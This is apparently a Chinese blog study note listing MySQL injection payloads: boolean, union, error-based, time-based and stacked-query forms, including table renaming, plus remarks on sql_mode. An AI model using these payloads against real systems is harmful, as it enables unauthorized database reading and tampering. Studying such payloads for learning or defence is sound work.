标签:show sql 笔记 mode 表名 select 注入
sql注入
基础的sql语句注入
1' or '1'='1'# #or语句
1' order by 3# #order语句
1' union select 1,2,3# #联合查询
1' and (select extractvalue(1,concat('~',(select database())))) #报错注入
1' and if(length(database())>1,sleep(5),1)--+ #时间注入
1;show databases;# //堆叠注入
1';show tables;#
select sql_mode;
select @@global.sql_mode; #查看全局的sql_mode
select @@session.sql_mode; #查看当前会话的sql_mode
pipes_as_concat:
补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则
PIPES_AS_CONCAT(pipes_as_concat):将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似
堆叠注入
1';show tables;# 获取所以表 若查询到的表名是数字,要使用反引号包括起来`1`
1';show columns from 表名;# 获取表中的字段名
1';alter table 表名 rename 新表名;# 修改表名
1';alter table 表名 change 旧字段名 新字段名 类型;# 修改表中的字段名
标签:show,
sql,
笔记,
mode,
表名,
select,
注入
From: https://www.cnblogs.com/--Lookback--/p/17444619.html